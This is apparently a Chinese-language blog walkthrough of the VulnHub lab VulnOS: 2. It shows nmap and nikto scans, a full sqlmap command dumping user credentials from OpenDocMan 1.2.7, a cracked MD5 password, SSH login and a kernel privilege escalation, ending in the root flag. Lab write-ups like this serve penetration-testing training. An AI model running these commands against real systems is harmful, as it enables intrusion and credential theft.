Vulnhub-Vulnos:2

前言

靶机地址：VulnOS: 2 ~ VulnHub

靶机下载地址：https://download.vulnhub.com/vulnos/VulnOSv2.7z

攻击机：kali linux

靶机描述：

信息收集

主机发现

nmap -sn 192.168.56.0/24

靶机地址为192.168.56.104

端口扫描

sudo nmap -p- 192.168.56.104

详细信息扫描

sudo nmap -p22,80,6667 -A 192.168.56.104

漏洞扫描

nmap

sudo nmap -p22,80,6667 --script=vuln 192.168.56.104

nikto

nikto -h 192.168.56.104

web信息收集

网站首页

可以看到有一个website，点击进入

这里进入到一个新的页面，随便点点发现有提示，这里背景色全部都是黑色的所以说进入一个新页面全选看看。

这里发现了目录地址/jabcd0cs/以及账号密码：guest/guest

发现了网站版本，OpenDocMan v1.2.7，在漏洞库中搜索相关漏洞

只有一个我们复制到当前文件夹下面

这里发现一个sql注入漏洞，有点类似我们之前漏洞扫描出来的sql注入，不过当时没有细看。

立足点

sql注入漏洞

那就直接用sqlmap开始梭哈

sqlmap -u "http://192.168.56.104/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --level=3 -risk=3 -D jabcd0cs -T odm_user -C id,username,password --dump --batch

webmin | b78aae356709f8c31118ea613980954b

对密码进行md5破解MD5免费在线解密破解_MD5在线加密-SOMD5

密码：webmin1980

使用ssh登录服务器

成功登录服务器，在服务器上翻了一下并未发现flag，那就继续进行提权吧。

提权

首先尝试sudo -l查看有root权限的文件，发现并不行，查看内核版本搜索内核相关漏洞

发现版本为3.13.0

搜索漏洞库，发现一个符合版本的本地提权

我们复制到当前文件夹下

本地用python3启动一个web服务，靶机用wget进行下载

编译执行该文件

成功拿到root权限

查看一下flag

Hello and welcome.
You successfully compromised the company "JABC" and the server completely !!
Congratulations !!!
Hope you enjoyed it.

What do you think of A.I.?

本栏目推荐文章
• 春秋云境 Delegation WP
• CTFshow元旦水友赛 Crypto wp
• NewStarCTF 2023 Week1 MISC-wp
• vulnhub-DC-6
• 春秋云镜 Hospital WP
• vulnhub靶场渗透学习
• vulnhub-DC-5
• CTFshow元旦水友赛 CRYPTO WP
• Lab 1-Vulnhub - Kioptix Level 1
• CBCTF pyjail wp

Vulnhub-Vulnos Vulnhub Vulnos WPvulnhub-vulnos vulnhub vulnos wp vulnhub-vulnos vulnhub-wp vulnhub-evm-wp vulnhub_earth_wp vulnhub_misdirection_wp vulnhub_broken_wp vulnhub-wp-funbox vulnhub_acid_wp vulnhub_acid_wp vulnhub acid wp